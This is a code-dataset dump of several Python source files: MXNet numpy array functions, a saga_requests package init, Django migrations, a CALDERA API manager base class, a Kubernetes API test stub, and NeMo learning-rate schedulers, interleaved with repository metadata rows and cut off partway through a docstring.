@set_module('mxnet.ndarray.numpy')
def nan_to_num(x, copy=True, nan=0.0, posinf=None, neginf=None, **kwargs):
if isinstance(x, numeric_types):
return _np.nan_to_num(x, copy, nan, posinf, neginf)
elif isinstance(x, NDArray):
if x.dtype in ['int8', 'uint8', 'int32', 'int64']:
return x
if not copy:
return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=x)
return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=None)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isnan(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.isnan, _np.isnan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isinf(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.isinf, _np.isinf, out=out, **kwargs)
@wrap_np_unary_func
def isposinf(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.isposinf, _np.isposinf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isneginf(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.isneginf, _np.isneginf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isfinite(x, out=None, **kwargs):
return _unary_func_helper(x, _npi.isfinite, _np.isfinite, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
def where(condition, x=None, y=None):
if x is None and y is None:
return nonzero(condition)
else:
if isinstance(condition, numeric_types):
if condition != 0:
return x
else:
return y
else:
if isinstance(x, numeric_types) and isinstance(y, numeric_types):
return _npi.where_scalar2(condition, float(x), float(y), out=None)
elif isinstance(x, NDArray) and isinstance(y, NDArray):
return _npi.where(condition, x, y, out=None)
elif isinstance(y, NDArray):
return _npi.where_lscalar(condition, y, float(x), out=None)
elif isinstance(x, NDArray):
return _npi.where_rscalar(condition, x, float(y), out=None)
else:
raise TypeError('type {0} and {1} not supported'.format(str(type(x)), str(type(y))))
@set_module('mxnet.ndarray.numpy')
def polyval(p, x):
from ...numpy import ndarray
if isinstance(p, ndarray) and isinstance(x, ndarray):
return _npi.polyval(p, x)
elif not isinstance(p, ndarray) and not isinstance(x, ndarray):
return _np.polyval(p, x)
else:
raise TypeError('type not supported')
@set_module('mxnet.ndarray.numpy')
def bincount(x, weights=None, minlength=0):
if not isinstance(x, NDArray):
raise TypeError("Input data should be NDarray")
if minlength < 0:
raise ValueError("Minlength value should greater than 0")
if weights is None:
return _npi.bincount(x, minlength=minlength, has_weights=False)
return _npi.bincount(x, weights=weights, minlength=minlength, has_weights=True)
| true | true |
f7236591419eeb6e4e4a15c30657c248c82b020e | 340 | py | Python | saga_requests/__init__.py | titans55/saga-requests | 39c83a14ece3bace6235ca4ade47a462218b6846 | [
"MIT"
] | null | null | null | saga_requests/__init__.py | titans55/saga-requests | 39c83a14ece3bace6235ca4ade47a462218b6846 | [
"MIT"
] | null | null | null | saga_requests/__init__.py | titans55/saga-requests | 39c83a14ece3bace6235ca4ade47a462218b6846 | [
"MIT"
] | null | null | null | __title__ = 'saga_requests'
__description__ = 'Saga pattern implementation for sequential HTTP requests.'
__author__ = 'Kutay Aslan'
__author_email__ = 'kutay.aslan97@gmail.com'
__license__ = 'MIT'
__copyright__ = 'Copyright 2021 Kutay Aslan'
from .saga_requests import SagaBuilder, SagaAction, SagaRequest, SagaRequestKwargs, SagaContext
| 37.777778 | 95 | 0.811765 | __title__ = 'saga_requests'
__description__ = 'Saga pattern implementation for sequential HTTP requests.'
__author__ = 'Kutay Aslan'
__author_email__ = 'kutay.aslan97@gmail.com'
__license__ = 'MIT'
__copyright__ = 'Copyright 2021 Kutay Aslan'
from .saga_requests import SagaBuilder, SagaAction, SagaRequest, SagaRequestKwargs, SagaContext
| true | true |
f72365d1a8d8b966f5901dc54dc01c7786bf2df8 | 650 | py | Python | msgboard/migrations/0001_initial.py | jeniaSakirko/beyond-tutorial | cd847d5af53bd385d0741941216b965d29019999 | [
"MIT"
] | null | null | null | msgboard/migrations/0001_initial.py | jeniaSakirko/beyond-tutorial | cd847d5af53bd385d0741941216b965d29019999 | [
"MIT"
] | null | null | null | msgboard/migrations/0001_initial.py | jeniaSakirko/beyond-tutorial | cd847d5af53bd385d0741941216b965d29019999 | [
"MIT"
] | null | null | null | # Generated by Django 4.0.2 on 2022-02-06 14:36
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Message',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=200)),
('text', models.TextField()),
('date', models.DateTimeField(default=django.utils.timezone.now)),
],
),
]
| 26 | 117 | 0.586154 |
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Message',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=200)),
('text', models.TextField()),
('date', models.DateTimeField(default=django.utils.timezone.now)),
],
),
]
| true | true |
f72366d69928dd9d5365212ab55ce0ab33c99366 | 770 | py | Python | students/K33402/Kondrashov_Egor/LR2/commerce/auctions/migrations/0002_listing.py | emina13/ITMO_ICT_WebDevelopment_2021-2022 | 498a6138e352e7e0ca40d1eb301bc29416158f51 | [
"MIT"
] | 7 | 2021-09-02T08:20:58.000Z | 2022-01-12T11:48:07.000Z | students/K33402/Kondrashov_Egor/LR2/commerce/auctions/migrations/0002_listing.py | emina13/ITMO_ICT_WebDevelopment_2021-2022 | 498a6138e352e7e0ca40d1eb301bc29416158f51 | [
"MIT"
] | 76 | 2021-09-17T23:01:50.000Z | 2022-03-18T16:42:03.000Z | students/K33402/Kondrashov_Egor/LR2/commerce/auctions/migrations/0002_listing.py | emina13/ITMO_ICT_WebDevelopment_2021-2022 | 498a6138e352e7e0ca40d1eb301bc29416158f51 | [
"MIT"
] | 60 | 2021-09-04T16:47:39.000Z | 2022-03-21T04:41:27.000Z | # Generated by Django 3.0.6 on 2020-10-02 12:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auctions', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Listing',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=128)),
('description', models.TextField()),
('starting_bid', models.DecimalField(decimal_places=2, max_digits=15)),
('image_url', models.URLField(blank=True)),
('category', models.CharField(max_length=64)),
],
),
]
| 30.8 | 114 | 0.571429 |
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auctions', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Listing',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=128)),
('description', models.TextField()),
('starting_bid', models.DecimalField(decimal_places=2, max_digits=15)),
('image_url', models.URLField(blank=True)),
('category', models.CharField(max_length=64)),
],
),
]
| true | true |
f723687904dbdb6f989fe5a914c859d639ace454 | 6,674 | py | Python | app/api/v2/managers/base_api_manager.py | mihaid-b/caldera | 90af73188a9865757c167efd31cbd87a8e6160b1 | [
"Apache-2.0"
] | null | null | null | app/api/v2/managers/base_api_manager.py | mihaid-b/caldera | 90af73188a9865757c167efd31cbd87a8e6160b1 | [
"Apache-2.0"
] | 2 | 2022-01-07T00:58:19.000Z | 2022-01-07T00:58:20.000Z | app/api/v2/managers/base_api_manager.py | mihaid-b/caldera | 90af73188a9865757c167efd31cbd87a8e6160b1 | [
"Apache-2.0"
] | null | null | null | import logging
import os
import uuid
import yaml
from marshmallow.schema import SchemaMeta
from typing import Any, List
from base64 import b64encode, b64decode
from app.utility.base_world import BaseWorld
DEFAULT_LOGGER_NAME = 'rest_api_manager'
class BaseApiManager(BaseWorld):
def __init__(self, data_svc, file_svc, logger=None):
self._data_svc = data_svc
self._file_svc = file_svc
self._log = logger or self._create_default_logger()
@property
def log(self):
return self._log
def find_objects(self, ram_key: str, search: dict = None):
"""Find objects matching the given criteria"""
for obj in self._data_svc.ram[ram_key]:
if not search or obj.match(search):
yield obj
def find_object(self, ram_key: str, search: dict = None):
for obj in self.find_objects(ram_key, search):
return obj
def find_and_dump_objects(self, ram_key: str, search: dict = None, sort: str = None, include: List[str] = None,
exclude: List[str] = None):
matched_objs = []
for obj in self.find_objects(ram_key, search):
dumped_obj = self.dump_object_with_filters(obj, include, exclude)
matched_objs.append(dumped_obj)
sorted_objs = sorted(matched_objs, key=lambda p: p.get(sort, 0))
if sorted_objs and sort in sorted_objs[0]:
return sorted(sorted_objs,
key=lambda x: 0 if x[sort] == self._data_svc.get_config(f"objects.{ram_key}.default") else 1)
return sorted_objs
@staticmethod
def dump_object_with_filters(obj: Any, include: List[str] = None, exclude: List[str] = None) -> dict:
dumped = obj.display
if include:
exclude_attributes = list(set(dumped.keys()) - set(include))
exclude = set(exclude + exclude_attributes) if exclude else exclude_attributes
if exclude:
for exclude_attribute in exclude:
dumped.pop(exclude_attribute, None)
return dumped
def create_object_from_schema(self, schema: SchemaMeta, data: dict, access: BaseWorld.Access):
obj_schema = schema()
obj = obj_schema.load(data)
obj.access = self._get_allowed_from_access(access)
return obj.store(self._data_svc.ram)
async def create_on_disk_object(self, data: dict, access: dict, ram_key: str, id_property: str, obj_class: type):
obj_id = data.get(id_property) or str(uuid.uuid4())
data[id_property] = obj_id
file_path = await self._get_new_object_file_path(data[id_property], ram_key)
allowed = self._get_allowed_from_access(access)
await self._save_and_reload_object(file_path, data, obj_class, allowed)
return next(self.find_objects(ram_key, {id_property: obj_id}))
def _get_allowed_from_access(self, access) -> BaseWorld.Access:
if self._data_svc.Access.HIDDEN in access['access']:
return self._data_svc.Access.HIDDEN
elif self._data_svc.Access.BLUE in access['access']:
return self._data_svc.Access.BLUE
else:
return self._data_svc.Access.RED
def find_and_update_object(self, ram_key: str, data: dict, search: dict = None):
for obj in self.find_objects(ram_key, search):
new_obj = self.update_object(obj, data)
return new_obj
def update_object(self, obj: Any, data: dict):
dumped_obj = obj.schema.dump(obj)
for key, value in dumped_obj.items():
if key not in data:
data[key] = value
return self.replace_object(obj, data)
def replace_object(self, obj: Any, data: dict):
new_obj = obj.schema.load(data)
return new_obj.store(self._data_svc.ram)
async def find_and_update_on_disk_object(self, data: dict, search: dict, ram_key: str, id_property: str, obj_class: type):
for obj in self.find_objects(ram_key, search):
new_obj = await self.update_on_disk_object(obj, data, ram_key, id_property, obj_class)
return new_obj
async def update_on_disk_object(self, obj: Any, data: dict, ram_key: str, id_property: str, obj_class: type):
obj_id = getattr(obj, id_property)
file_path = await self._get_existing_object_file_path(obj_id, ram_key)
existing_obj_data = dict(self.strip_yml(file_path)[0])
existing_obj_data.update(data)
await self._save_and_reload_object(file_path, existing_obj_data, obj_class, obj.access)
return next(self.find_objects(ram_key, {id_property: obj_id}))
async def replace_on_disk_object(self, obj: Any, data: dict, ram_key: str, id_property: str):
obj_id = getattr(obj, id_property)
file_path = await self._get_existing_object_file_path(obj_id, ram_key)
await self._save_and_reload_object(file_path, data, type(obj), obj.access)
return next(self.find_objects(ram_key, {id_property: obj_id}))
async def remove_object_from_memory_by_id(self, identifier: str, ram_key: str, id_property: str):
await self._data_svc.remove(ram_key, {id_property: identifier})
async def remove_object_from_disk_by_id(self, identifier: str, ram_key: str):
file_path = await self._get_existing_object_file_path(identifier, ram_key)
if os.path.exists(file_path):
os.remove(file_path)
@staticmethod
async def _get_new_object_file_path(identifier: str, ram_key: str) -> str:
"""Create file path for new object"""
return os.path.join('data', ram_key, f'{identifier}.yml')
async def _get_existing_object_file_path(self, identifier: str, ram_key: str) -> str:
"""Find file path for existing object (by id)"""
_, file_path = await self._file_svc.find_file_path(f'{identifier}.yml', location=ram_key)
if not file_path:
file_path = await self._get_new_object_file_path(identifier, ram_key)
return file_path
async def _save_and_reload_object(self, file_path: str, data: dict, obj_type: type, access: BaseWorld.Access):
"""Save data as YAML and reload from disk into memory"""
await self._file_svc.save_file(file_path, yaml.dump(data, encoding='utf-8', sort_keys=False), '', encrypt=False)
await self._data_svc.load_yaml_file(obj_type, file_path, access)
@staticmethod
def _create_default_logger():
return logging.getLogger(DEFAULT_LOGGER_NAME)
@staticmethod
def _encode_string(s):
return str(b64encode(s.encode()), 'utf-8')
@staticmethod
def _decode_string(s):
return str(b64decode(s), 'utf-8')
| 42.509554 | 126 | 0.677705 | import logging
import os
import uuid
import yaml
from marshmallow.schema import SchemaMeta
from typing import Any, List
from base64 import b64encode, b64decode
from app.utility.base_world import BaseWorld
DEFAULT_LOGGER_NAME = 'rest_api_manager'
class BaseApiManager(BaseWorld):
def __init__(self, data_svc, file_svc, logger=None):
self._data_svc = data_svc
self._file_svc = file_svc
self._log = logger or self._create_default_logger()
@property
def log(self):
return self._log
def find_objects(self, ram_key: str, search: dict = None):
for obj in self._data_svc.ram[ram_key]:
if not search or obj.match(search):
yield obj
def find_object(self, ram_key: str, search: dict = None):
for obj in self.find_objects(ram_key, search):
return obj
def find_and_dump_objects(self, ram_key: str, search: dict = None, sort: str = None, include: List[str] = None,
exclude: List[str] = None):
matched_objs = []
for obj in self.find_objects(ram_key, search):
dumped_obj = self.dump_object_with_filters(obj, include, exclude)
matched_objs.append(dumped_obj)
sorted_objs = sorted(matched_objs, key=lambda p: p.get(sort, 0))
if sorted_objs and sort in sorted_objs[0]:
return sorted(sorted_objs,
key=lambda x: 0 if x[sort] == self._data_svc.get_config(f"objects.{ram_key}.default") else 1)
return sorted_objs
@staticmethod
def dump_object_with_filters(obj: Any, include: List[str] = None, exclude: List[str] = None) -> dict:
dumped = obj.display
if include:
exclude_attributes = list(set(dumped.keys()) - set(include))
exclude = set(exclude + exclude_attributes) if exclude else exclude_attributes
if exclude:
for exclude_attribute in exclude:
dumped.pop(exclude_attribute, None)
return dumped
def create_object_from_schema(self, schema: SchemaMeta, data: dict, access: BaseWorld.Access):
obj_schema = schema()
obj = obj_schema.load(data)
obj.access = self._get_allowed_from_access(access)
return obj.store(self._data_svc.ram)
async def create_on_disk_object(self, data: dict, access: dict, ram_key: str, id_property: str, obj_class: type):
obj_id = data.get(id_property) or str(uuid.uuid4())
data[id_property] = obj_id
file_path = await self._get_new_object_file_path(data[id_property], ram_key)
allowed = self._get_allowed_from_access(access)
await self._save_and_reload_object(file_path, data, obj_class, allowed)
return next(self.find_objects(ram_key, {id_property: obj_id}))
def _get_allowed_from_access(self, access) -> BaseWorld.Access:
if self._data_svc.Access.HIDDEN in access['access']:
return self._data_svc.Access.HIDDEN
elif self._data_svc.Access.BLUE in access['access']:
return self._data_svc.Access.BLUE
else:
return self._data_svc.Access.RED
def find_and_update_object(self, ram_key: str, data: dict, search: dict = None):
for obj in self.find_objects(ram_key, search):
new_obj = self.update_object(obj, data)
return new_obj
def update_object(self, obj: Any, data: dict):
dumped_obj = obj.schema.dump(obj)
for key, value in dumped_obj.items():
if key not in data:
data[key] = value
return self.replace_object(obj, data)
def replace_object(self, obj: Any, data: dict):
new_obj = obj.schema.load(data)
return new_obj.store(self._data_svc.ram)
async def find_and_update_on_disk_object(self, data: dict, search: dict, ram_key: str, id_property: str, obj_class: type):
for obj in self.find_objects(ram_key, search):
new_obj = await self.update_on_disk_object(obj, data, ram_key, id_property, obj_class)
return new_obj
async def update_on_disk_object(self, obj: Any, data: dict, ram_key: str, id_property: str, obj_class: type):
obj_id = getattr(obj, id_property)
file_path = await self._get_existing_object_file_path(obj_id, ram_key)
existing_obj_data = dict(self.strip_yml(file_path)[0])
existing_obj_data.update(data)
await self._save_and_reload_object(file_path, existing_obj_data, obj_class, obj.access)
return next(self.find_objects(ram_key, {id_property: obj_id}))
async def replace_on_disk_object(self, obj: Any, data: dict, ram_key: str, id_property: str):
obj_id = getattr(obj, id_property)
file_path = await self._get_existing_object_file_path(obj_id, ram_key)
await self._save_and_reload_object(file_path, data, type(obj), obj.access)
return next(self.find_objects(ram_key, {id_property: obj_id}))
async def remove_object_from_memory_by_id(self, identifier: str, ram_key: str, id_property: str):
await self._data_svc.remove(ram_key, {id_property: identifier})
async def remove_object_from_disk_by_id(self, identifier: str, ram_key: str):
file_path = await self._get_existing_object_file_path(identifier, ram_key)
if os.path.exists(file_path):
os.remove(file_path)
@staticmethod
async def _get_new_object_file_path(identifier: str, ram_key: str) -> str:
return os.path.join('data', ram_key, f'{identifier}.yml')
async def _get_existing_object_file_path(self, identifier: str, ram_key: str) -> str:
_, file_path = await self._file_svc.find_file_path(f'{identifier}.yml', location=ram_key)
if not file_path:
file_path = await self._get_new_object_file_path(identifier, ram_key)
return file_path
async def _save_and_reload_object(self, file_path: str, data: dict, obj_type: type, access: BaseWorld.Access):
await self._file_svc.save_file(file_path, yaml.dump(data, encoding='utf-8', sort_keys=False), '', encrypt=False)
await self._data_svc.load_yaml_file(obj_type, file_path, access)
@staticmethod
def _create_default_logger():
return logging.getLogger(DEFAULT_LOGGER_NAME)
@staticmethod
def _encode_string(s):
return str(b64encode(s.encode()), 'utf-8')
@staticmethod
def _decode_string(s):
return str(b64decode(s), 'utf-8')
| true | true |
f72369f01567bc9d574542797ebf82f8d4500910 | 903 | py | Python | kubernetes/test/test_auditregistration_api.py | iamneha/python | 5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0 | [
"Apache-2.0"
] | 1 | 2019-02-17T15:28:39.000Z | 2019-02-17T15:28:39.000Z | kubernetes/test/test_auditregistration_api.py | iamneha/python | 5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_auditregistration_api.py | iamneha/python | 5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.auditregistration_api import AuditregistrationApi
class TestAuditregistrationApi(unittest.TestCase):
""" AuditregistrationApi unit test stubs """
def setUp(self):
self.api = kubernetes.client.apis.auditregistration_api.AuditregistrationApi()
def tearDown(self):
pass
def test_get_api_group(self):
"""
Test case for get_api_group
"""
pass
if __name__ == '__main__':
unittest.main()
| 20.066667 | 105 | 0.708749 |
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.auditregistration_api import AuditregistrationApi
class TestAuditregistrationApi(unittest.TestCase):
def setUp(self):
self.api = kubernetes.client.apis.auditregistration_api.AuditregistrationApi()
def tearDown(self):
pass
def test_get_api_group(self):
pass
if __name__ == '__main__':
unittest.main()
| true | true |
f7236a746c46b2c1dbd28b9ceab6f34dcfd7b14b | 21,947 | py | Python | nemo/core/optim/lr_scheduler.py | mcdavid109/NeMo | a7df3e0271ab6133f7fe057ec697f764c8637d54 | [
"Apache-2.0"
] | null | null | null | nemo/core/optim/lr_scheduler.py | mcdavid109/NeMo | a7df3e0271ab6133f7fe057ec697f764c8637d54 | [
"Apache-2.0"
] | null | null | null | nemo/core/optim/lr_scheduler.py | mcdavid109/NeMo | a7df3e0271ab6133f7fe057ec697f764c8637d54 | [
"Apache-2.0"
] | 1 | 2020-12-18T14:23:37.000Z | 2020-12-18T14:23:37.000Z | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import dataclasses
import math
import warnings
from functools import partial
from typing import Any, Dict, Optional, Union
import hydra
import torch.optim as optim
import torch.optim.lr_scheduler as pt_scheduler
import torch.utils.data.dataloader as dataloader
from omegaconf import DictConfig, OmegaConf
from torch.optim.lr_scheduler import _LRScheduler
from nemo.core.config import SchedulerParams, get_scheduler_config, register_scheduler_params
from nemo.utils import logging
class WarmupPolicy(_LRScheduler):
"""Adds warmup kwargs and warmup logic to lr policy.
All arguments should be passed as kwargs for clarity,
Args:
warmup_steps: Number of training steps in warmup stage
warmup_ratio: Ratio of warmup steps to total steps
max_steps: Total number of steps while training or `None` for
infinite training
"""
def __init__(self, optimizer, *, warmup_steps=None, warmup_ratio=None, max_steps=None, min_lr=0.0, last_epoch=-1):
assert not (
warmup_steps is not None and warmup_ratio is not None
), "Either use particular number of step or ratio"
assert warmup_ratio is None or max_steps is not None, "If there is a ratio, there should be a total steps"
# It is necessary to assign all attributes *before* __init__,
# as class is wrapped by an inner class.
self.max_steps = max_steps
if warmup_steps is not None:
self.warmup_steps = warmup_steps
elif warmup_ratio is not None:
self.warmup_steps = int(warmup_ratio * max_steps)
else:
self.warmup_steps = 0
self.min_lr = min_lr
super().__init__(optimizer, last_epoch)
def get_lr(self):
if not self._get_lr_called_within_step:
warnings.warn(
"To get the last learning rate computed by the scheduler, " "please use `get_last_lr()`.", UserWarning
)
step = self.last_epoch
if step <= self.warmup_steps:
lr_val = (step + 1) / (self.warmup_steps + 1)
return [initial_lr * lr_val for initial_lr in self.base_lrs]
if step > self.max_steps:
return [self.min_lr for _ in self.base_lrs]
return self._get_lr(step)
def _get_lr(self, step):
"""Simple const lr policy"""
return self.base_lrs
class WarmupHoldPolicy(WarmupPolicy):
"""Variant of WarmupPolicy which maintains high learning rate for a defined number of steps.
All arguments should be passed as kwargs for clarity,
Args:
warmup_steps: Number of training steps in warmup stage
warmup_ratio: Ratio of warmup steps to total steps
hold_steps: Number of training steps to hold the learning rate after warm up
hold_ratio: Ratio of hold steps to total steps
max_steps: Total number of steps while training or `None` for
infinite training
"""
def __init__(
self,
optimizer,
*,
warmup_steps=None,
warmup_ratio=None,
hold_steps=None,
hold_ratio=None,
max_steps=None,
min_lr=0.0,
last_epoch=-1,
):
assert not (hold_steps is not None and hold_ratio is not None), "Either use particular number of step or ratio"
assert hold_ratio is None or max_steps is not None, "If there is a ratio, there should be a total steps"
self.min_lr = min_lr
self._last_warmup_lr = 0.0
# Necessary to duplicate as class attributes are hidden in inner class
self.max_steps = max_steps
if warmup_steps is not None:
self.warmup_steps = warmup_steps
elif warmup_ratio is not None:
self.warmup_steps = int(warmup_ratio * max_steps)
else:
self.warmup_steps = 0
if hold_steps is not None:
self.hold_steps = hold_steps + self.warmup_steps
elif hold_ratio is not None:
self.hold_steps = int(hold_ratio * max_steps) + self.warmup_steps
else:
self.hold_steps = 0
super().__init__(
optimizer,
warmup_steps=warmup_steps,
warmup_ratio=warmup_ratio,
max_steps=max_steps,
last_epoch=last_epoch,
min_lr=min_lr,
)
def get_lr(self):
if not self._get_lr_called_within_step:
warnings.warn(
"To get the last learning rate computed by the scheduler, " "please use `get_last_lr()`.", UserWarning
)
step = self.last_epoch
# Warmup phase
if step <= self.warmup_steps:
lr_val = (step + 1) / (self.warmup_steps + 1)
return [initial_lr * lr_val for initial_lr in self.base_lrs]
# Hold phase
if (step >= self.warmup_steps) and (step < self.hold_steps):
return self.base_lrs
if step > self.max_steps:
return [self.min_lr for _ in self.base_lrs]
return self._get_lr(step)
def _squareroot_annealing(initial_lr, step, max_steps, min_lr):
mult = ((max_steps - step) / max_steps) ** 0.5
out_lr = initial_lr * mult
out_lr = max(out_lr, min_lr)
return out_lr
def _square_annealing(initial_lr, step, max_steps, min_lr):
mult = ((max_steps - step) / max_steps) ** 2
out_lr = initial_lr * mult
out_lr = max(out_lr, min_lr)
return out_lr
def _cosine_annealing(initial_lr, step, max_steps, min_lr):
mult = 0.5 * (1 + math.cos(math.pi * step / max_steps))
out_lr = (initial_lr - min_lr) * mult + min_lr
return out_lr
def _poly_decay(initial_lr, step, decay_steps, power, min_lr, cycle):
if cycle:
multiplier = 1.0 if step == 0 else math.ceil(step / decay_steps)
decay_steps *= multiplier
else:
step = min(step, decay_steps)
p = step / decay_steps
lr = (initial_lr - min_lr) * math.pow(1.0 - p, power)
lr += min_lr
return lr
class SquareAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=1e-5, last_epoch=-1, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
new_lrs = [
_square_annealing(
initial_lr=initial_lr,
step=step - self.warmup_steps,
max_steps=self.max_steps - self.warmup_steps,
min_lr=self.min_lr,
)
for initial_lr in self.base_lrs
]
return new_lrs
class SquareRootAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=0, last_epoch=-1, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
new_lrs = [
_squareroot_annealing(initial_lr=initial_lr, step=step, max_steps=self.max_steps, min_lr=self.min_lr,)
for initial_lr in self.base_lrs
]
return new_lrs
class CosineAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=0, last_epoch=-1, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
for initial_lr in self.base_lrs:
if initial_lr < self.min_lr:
raise ValueError(
f"{self} received an initial learning rate that " f"was lower than the minimum learning rate."
)
new_lrs = [
_cosine_annealing(
initial_lr=initial_lr,
step=step - self.warmup_steps,
max_steps=self.max_steps - self.warmup_steps,
min_lr=self.min_lr,
)
for initial_lr in self.base_lrs
]
return new_lrs
class WarmupAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, last_epoch=-1, min_lr=0.0, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
progress = float(step / self.max_steps)
warmup_ratio = float(self.warmup_steps / self.max_steps)
mult = max((progress - 1.0) / (warmup_ratio - 1.0), 0.0)
out_lr = [initial_lr * mult for initial_lr in self.base_lrs]
return out_lr
class InverseSquareRootAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, last_epoch=-1, min_lr=0.0, **kwargs):
super().__init__(optimizer=optimizer, max_steps=max_steps, **kwargs, last_epoch=last_epoch, min_lr=min_lr)
def _get_lr(self, step):
denom = ((step + 1) / (self.warmup_steps + 1)) ** 0.5
out_lr = [initial_lr / denom for initial_lr in self.base_lrs]
return out_lr
class PolynomialDecayAnnealing(WarmupPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=0.0, power=1.0, cycle=False, last_epoch=-1, **kwargs):
self.power = power
self.cycle = cycle
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
new_lrs = [
_poly_decay(
initial_lr,
step=step - self.warmup_steps,
decay_steps=self.max_steps - self.warmup_steps,
power=self.power,
min_lr=self.min_lr,
cycle=self.cycle,
)
for initial_lr in self.base_lrs
]
return new_lrs
class PolynomialHoldDecayAnnealing(WarmupHoldPolicy):
def __init__(self, optimizer, *, max_steps, min_lr=0.0, power=1.0, cycle=False, last_epoch=-1, **kwargs):
self.power = power
self.cycle = cycle
super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)
def _get_lr(self, step):
new_lrs = [
_poly_decay(
initial_lr,
step=step - self.hold_steps,
decay_steps=self.max_steps - max(self.warmup_steps, self.hold_steps),
power=self.power,
min_lr=self.min_lr,
cycle=self.cycle,
)
for initial_lr in self.base_lrs
]
return new_lrs
def register_scheduler(name: str, scheduler: _LRScheduler, scheduler_params: SchedulerParams):
"""
Checks if the scheduler name exists in the registry, and if it doesnt, adds it.
This allows custom schedulers to be added and called by name during instantiation.
Args:
name: Name of the optimizer. Will be used as key to retrieve the optimizer.
scheduler: Scheduler class (inherits from _LRScheduler)
scheduler_params: The parameters as a dataclass of the scheduler
"""
if name in AVAILABLE_SCHEDULERS:
raise ValueError(f"Cannot override pre-existing schedulers. Conflicting scheduler name = {name}")
AVAILABLE_SCHEDULERS[name] = scheduler
sched_name = "{}_params".format(scheduler.__name__)
register_scheduler_params(name=sched_name, scheduler_params=scheduler_params)
def get_scheduler(name: str, **kwargs: Optional[Dict[str, Any]]) -> _LRScheduler:
"""
Convenience method to obtain an _LRScheduler class and partially instantiate it with optimizer kwargs.
Args:
name: Name of the scheduler in the registry.
kwargs: Optional kwargs of the scheduler used during instantiation.
Returns:
a partially instantiated _LRScheduler
"""
if name not in AVAILABLE_SCHEDULERS:
raise ValueError(
f"Cannot resolve scheduler{name}'. Available optimizers are : " f"{AVAILABLE_SCHEDULERS.keys()}"
)
scheduler_cls = AVAILABLE_SCHEDULERS[name]
scheduler = partial(scheduler_cls, **kwargs)
return scheduler
def prepare_lr_scheduler(
optimizer: optim.Optimizer,
scheduler_config: Union[Dict[str, Any], DictConfig],
train_dataloader: Optional[dataloader.DataLoader] = None,
) -> Optional[Dict[str, Any]]:
"""
Constructs an LR Scheduler (optionally) for a given optimizer, based on a config with the following schema
optim:
name: <name of optimizer>
lr: <maximal learning rate>
# <additional optimizer arguments>
args:
name: auto # special keyword, resolves to correct optimizer config for given optimizer name
# cls: nemo.core.config.optimizers.NovogradParams # explicit instantiation by class path
params: # optional override parameters for the optimizer config
betas: [0.8, 0.5]
weight_decay: 0.001
# scheduler setup
sched:
name: <name of scheduler>
